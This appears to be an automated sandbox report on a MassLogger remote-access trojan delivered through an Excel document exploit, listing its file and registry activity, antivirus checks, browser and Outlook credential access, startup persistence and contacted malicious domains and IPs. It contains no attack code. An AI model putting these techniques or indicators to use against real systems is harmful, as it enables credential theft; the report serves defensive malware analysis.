Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\ProgramData\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
Source: C:\ProgramData\a.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839119724.0000000000C8A000.00000004.00000001.sdmp Binary or memory string: \??\C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
Source: a.exe, 00000001.00000002.709230972.0000000000BC7000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: a.exe, 00000001.00000002.709683488.00000000027FE000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.774809994.0000000002CFC000.00000004.00000001.sdmp, a.exe, 00000011.00000002.844042385.0000000002A53000.00000004.00000001.sdmp Binary or memory string: e.C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
Source: a.exe, 00000001.00000002.709683488.00000000027FE000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.774809994.0000000002CFC000.00000004.00000001.sdmp, a.exe, 00000011.00000002.844042385.0000000002A53000.00000004.00000001.sdmp Binary or memory string: e(C:\Program Files\AVG\Antivirus\AVGUI.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\ProgramData\a.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Stealing of Sensitive Information:

barindex
Yara detected MassLogger RAT
Source: Yara match File source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match File source: 1.2.a.exe.39bc1e0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3a9c1e0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3a9c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3b7c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3c9c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3bbc1e0.2.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5508, type: MEMORY

Remote Access Functionality:

barindex
Yara detected MassLogger RAT
Source: Yara match File source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match File source: 1.2.a.exe.39bc1e0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3a9c1e0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3a9c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3b7c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3c9c240.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3bbc1e0.2.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 356267 Sample: LIQUIDACION INTERBANCARIA 0... Startdate: 22/02/2021 Architecture: WINDOWS Score: 100 68 Malicious sample detected (through community Yara rule) 2->68 70 Antivirus detection for URL or domain 2->70 72 Multi AV Scanner detection for dropped file 2->72 74 15 other signatures 2->74 10 EXCEL.EXE 78 53 2->10         started        15 a.exe 3 2->15         started        process3 dnsIp4 60 www.seyranikenger.com.tr 10->60 62 seyranikenger.com.tr 185.162.146.6, 443, 49731 BURSABILTR Turkey 10->62 42 C:\Users\user\...\mensajeria_system[1].exe, PE32 10->42 dropped 44 C:\ProgramData\a.exe, PE32 10->44 dropped 86 Document exploit detected (creates forbidden files) 10->86 88 Document exploit detected (process start blacklist hit) 10->88 90 Document exploit detected (UrlDownloadToFile) 10->90 17 a.exe 15 3 10->17         started        64 raw.githubusercontent.com 15->64 66 pastex.pro 15->66 21 a.exe 15->21         started        23 a.exe 15->23         started        file5 signatures6 process7 dnsIp8 46 pastex.pro 45.148.121.68, 49739, 49747, 49754 SKB-ENTERPRISENL Netherlands 17->46 48 raw.githubusercontent.com 185.199.108.133, 443, 49741, 49748 FASTLYUS Netherlands 17->48 76 Multi AV Scanner detection for dropped file 17->76 78 Machine Learning detection for dropped file 17->78 25 cmd.exe 1 17->25         started        50 smtp.saleforceconsults.com 21->50 52 us2.smtp.mailhostbox.com 208.91.199.223, 49761, 587 PUBLIC-DOMAIN-REGISTRYUS United States 21->52 54 3 other IPs or domains 21->54 80 Tries to steal Mail credentials (via file access) 21->80 82 Tries to harvest and steal browser information (history, passwords, etc) 21->82 signatures9 process10 signatures11 84 Suspicious powershell command line found 25->84 28 wscript.exe 25->28         started        31 powershell.exe 18 25->31         started        33 conhost.exe 25->33         started        35 timeout.exe 1 25->35         started        process12 signatures13 92 Drops PE files to the user root directory 28->92 94 Drops PE files to the startup folder 28->94 37 a.exe 31->37         started        process14 dnsIp15 56 raw.githubusercontent.com 37->56 58 pastex.pro 37->58 40 a.exe 37->40         started        process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.148.121.68
 unknown Netherlands
64425 SKB-ENTERPRISENL false
54.225.220.115
 unknown United States
14618 AMAZON-AESUS false
185.199.108.133
 unknown Netherlands
54113 FASTLYUS false
208.91.199.223
 unknown United States
394695 PUBLIC-DOMAIN-REGISTRYUS false
185.162.146.6
 unknown Turkey
60721 BURSABILTR false

Contacted Domains

Name IP Active
pastex.pro 45.148.121.68 true
elb097307-934924932.us-east-1.elb.amazonaws.com 54.225.220.115 true
us2.smtp.mailhostbox.com 208.91.199.223 true
raw.githubusercontent.com 185.199.108.133 true
seyranikenger.com.tr 185.162.146.6 true
smtp.saleforceconsults.com unknown unknown
api.ipify.org unknown unknown
www.seyranikenger.com.tr unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://api.ipify.org/ false
    		high